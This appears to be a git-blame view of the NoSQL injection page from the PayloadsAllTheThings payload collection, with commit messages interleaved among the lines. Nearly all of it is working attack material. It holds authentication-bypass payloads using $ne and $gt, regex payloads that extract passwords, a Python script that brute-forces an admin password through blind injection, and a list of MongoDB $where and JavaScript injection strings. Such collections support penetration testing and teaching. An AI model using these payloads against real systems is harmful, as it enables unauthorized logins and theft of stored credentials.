Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/NoSQL injection/README.md

88 lines
2.5 KiB
Markdown
Raw Normal View History

NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
# NoSQL injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Exploit
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
Basic authentication bypass using not equal ($ne) or greater ($gt)
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
```
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
in URL
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
username[$ne]=toto&password[$ne]=toto
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
```
Extract length information
```
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
Extract data information
```
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
in URL
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
## Blind NoSQL
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
```
Methodology updated with RPCClient, User enumeration
2017-05-17 18:40:45 +00:00
## MongoDB Payloads
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
NOSQL injection added + updates XSS/XXE
2016-10-30 11:53:32 +00:00
## Thanks to
Traversal Dir + NoSQL major updates + small addons
2018-02-15 22:27:42 +00:00
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
* https://github.com/cr0hn/nosqlinjection_wordlists
* https://zanon.io/posts/nosql-injection-in-mongodb
Reference in a new issue Copy permalink